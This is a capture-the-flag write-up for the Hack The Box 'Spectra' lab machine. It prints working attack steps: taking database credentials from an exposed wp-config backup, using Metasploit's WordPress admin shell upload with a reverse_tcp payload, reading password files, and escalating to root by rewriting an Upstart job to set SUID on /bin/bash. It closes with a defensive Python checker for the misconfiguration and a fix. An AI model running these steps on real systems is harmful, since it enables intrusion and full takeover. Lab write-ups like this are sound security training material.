INFO
Machine IP = 10.10.10.229
OS = Other
Level = EASY
Points = 20
Write the IP of the machine to your /etc/hosts file
```sh
echo "10.10.10.229 spectra.htb" >> /etc/hosts
```
Scanning
```sh
nmap -sC -sV 10.10.10.229
```
Enumeration
Nmap:
```text
22/tcp   ssh    OpenSSH 8.1 (protocol 2.0)
80/tcp   http   nginx 1.17.4
1098/tcp filtered rmiactivation
3306/tcp mysql  MySQL (unauthorized)
```
Port 80 – WordPress blog.
Create a directory Spectra, cd into it, and then run Gobuster.
Gobuster:
```sh
gobuster dir -u http://10.10.10.229 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log
```
```text
/index.html (Status: 200) [Size: 283]
/main (Status: 301) [Size: 169] [--> http://10.10.10.229/main/]
/testing (Status: 301) [Size: 169] [--> http://10.10.10.229/testing/]
```
Browsing /testing reveals what looks like a backup of the WordPress config file, wp-config.php.save (check the page source). You can download it with:
```sh
wget http://10.10.10.229/testing/wp-config.php.save
```
The important part is the database username and password:
```php
/** MySQL database username */
define( 'DB_USER', 'devtest' );
/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );
```
WordPress user enumeration with wpscan: the second directory from Gobuster, /main, hosts the WordPress install.
```sh
wpscan --url http://spectra.htb/main/ --random-user-agent --enumerate u
```
So we have the user administrator:
```text
[+] administrator
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
```
With the administrator username and the password from wp-config.php.save (devteam01), we can use Metasploit's wp_admin_shell_upload module:
```console
msf6 > search wp_admin_shell_upload
```
```console
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost <Your IP here>
lhost => 10.10.15.26
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lport 4444
lport => 4444
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 10.10.10.229
rhosts => 10.10.10.229
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
username => administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /main
targeturi => /main
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
shell
/bin/sh -i
```
Or, to upgrade to a proper TTY, you can use:
```console
python3 -c "import pty;pty.spawn('/bin/bash')"
nginx@spectra /tmp $
```
User Flag:
Let’s check for users:
```console
nginx@spectra / $ cat /etc/passwd
<SNIP>
nginx:x:20155:20156::/home/nginx:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bash
```
```console
nginx@spectra / $ ls -l /home/katie/
total 320
drwxr-xr-x 2 katie katie 4096 Jan 15 15:55 log
-r-------- 1 katie katie   33 Feb  2 15:57 user.txt
```
So we need to move from the restricted nginx user to katie to get the flag. After searching around the box, I found this in /opt:
```text
-rw-r--r-- 1 root root 978 Feb 3 16:02 autologin.conf.orig
```
Let’s have a look at that first:
```console
nginx@spectra /opt $ cat autologin.conf.orig
<SNIP>
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
<SNIP>
```
It’s a lengthy config script but there’s a line in there that points us to /etc/autologin.
```console
nginx@spectra /opt $ ls -l /etc/autologin
total 4
-rw-r--r-- 1 root root 19 Feb 3 16:43 passwd
```
```console
nginx@spectra /opt $ cat /etc/autologin/passwd
SummerHereWeCome!!
```
Perfect. We’ve found a password, which is presumably katie’s, as she is the only other user on the box. Let’s try SSH as katie with it.
Root Flag:
Now we have to escalate privileges. I’ll check the sudo privileges first and fall back to linPEAS if that fails:
```console
katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl
```
What is initctl? From its man page:
```text
initctl allows a system administrator to communicate and interact with the Upstart init(8) daemon.
init is the parent of all processes on the system, it is executed by the kernel and is responsible for starting all other processes.
```
So we can use initctl to start and stop system services, and those services run as root. That sounds like a simple way to get a root shell. First let’s see what’s in /etc/init:
```console
katie@spectra /etc/init $ ls -l
total 752
...
-rw-rw---- 1 root developers 478 Jun 29  2020 test.conf
-rw-rw---- 1 root developers 478 Jun 29  2020 test1.conf
-rw-rw---- 1 root developers 478 Jun 29  2020 test10.conf
-rw-rw---- 1 root developers 478 Jun 29  2020 test2.conf
-rw-rw---- 1 root developers 478 Jun 29  2020 test3.conf
-rw-rw---- 1 root developers 478 Jun 29  2020 test4.conf
-rw-rw---- 1 root developers 478 Jun 29  2020 test5.conf
-rw-rw---- 1 root developers 478 Jun 29  2020 test6.conf
-rw-rw---- 1 root developers 478 Jun 29  2020 test7.conf
-rw-rw---- 1 root developers 478 Jun 29  2020 test8.conf
-rw-rw---- 1 root developers 478 Jun 29  2020 test9.conf
...
```
Let’s check out the first one:
```console
katie@spectra /etc/init $ cat test.conf
description "Test node.js server"
author "katie"
start on filesystem or runlevel [2345]
stop on shutdown
script
    export HOME="/srv"
    echo $$ > /var/run/nodetest.pid
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js
end script
pre-start script
    echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script
pre-stop script
    rm /var/run/nodetest.pid
    echo
```
The job files are group-writable by developers (the -rw-rw---- mode above), so we can replace the contents of this one with our own script. Let’s have it set the SUID bit on /bin/bash so that katie can run bash with root privileges.
First find the test process:
```console
katie@spectra /etc/init $ sudo initctl list | grep test
test stop/waiting
test1 stop/waiting
test7 stop/waiting
test6 stop/waiting
test5 stop/waiting
test4 stop/waiting
test10 stop/waiting
```
It’s already stopped, so we can edit the conf file and then start it again:
```console
katie@spectra /etc/init $ cat test.conf
description "Test node.js server"
author "katie"
start on filesystem or runlevel [...]
stop on shutdown
script
    chmod +s /bin/bash
end script
```
Now we can start the process:
```console
katie@spectra /etc/init $ sudo /sbin/initctl start test
```
Now we can simply run bash with the -p option to get our root shell:
```console
katie@spectra /etc/init $ /bin/bash -p
bash-4.3# whoami
root
```
Grab the root flag and we are done:
```console
bash-4.3# cat /root/root.txt
```
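The root path chains two misconfigurations: a NOPASSWD sudo rule for initctl and Upstart job files in /etc/init that the developers group can write. The following audit helper checks captured `sudo -l` and `ls -l /etc/init` output for that combination. It is an added example, not part of the original writeup; the sample text is constructed from the listings shown above.

```python
import re

# `ls -l` line: mode, links, owner, group, size, month, day, year-or-time, name
LS_LINE = re.compile(
    r"^([-dl][rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$"
)
# `sudo -l` rule line, e.g. "(ALL) SETENV: NOPASSWD: /sbin/initctl"
SUDO_RULE = re.compile(r"^\(([^)]*)\)\s*((?:\w+:\s*)*)(/\S+)")


def writable_job_files(ls_output, trusted_groups=("root",)):
    """Return (name, group, why) for every *.conf job that group or others may write."""
    findings = []
    for line in ls_output.splitlines():
        m = LS_LINE.match(line.strip())
        if not m or not m.group(4).endswith(".conf"):
            continue
        mode, _owner, group, name = m.groups()
        why = []
        if mode[5] == "w" and group not in trusted_groups:  # group write bit
            why.append("group " + group)
        if mode[8] == "w":  # world write bit
            why.append("others")
        if why:
            findings.append((name, group, " and ".join(why)))
    return findings


def nopasswd_commands(sudo_output):
    """Return commands that `sudo -l` lists with the NOPASSWD tag."""
    cmds = []
    for line in sudo_output.splitlines():
        m = SUDO_RULE.match(line.strip())
        if m and "NOPASSWD" in m.group(2):
            cmds.append(m.group(3))
    return cmds


def job_control_escalation(sudo_output, ls_output):
    """True when passwordless initctl and an editable job file are both present."""
    initctl = any(c.endswith("/initctl") for c in nopasswd_commands(sudo_output))
    return initctl and bool(writable_job_files(ls_output))


# Constructed samples mirroring the output shown in the writeup.
SAMPLE_SUDO = """User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl"""
SAMPLE_LS = """total 752
-rw-rw---- 1 root developers 478 Jun 29 2020 test.conf
-rw-r----- 1 root root 478 Jun 29 2020 safe.conf"""
```

The fix on a real host is the same pair of checks in reverse: job files in /etc/init owned and writable by root only, and no passwordless sudo rule for a job controller such as initctl.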
Done!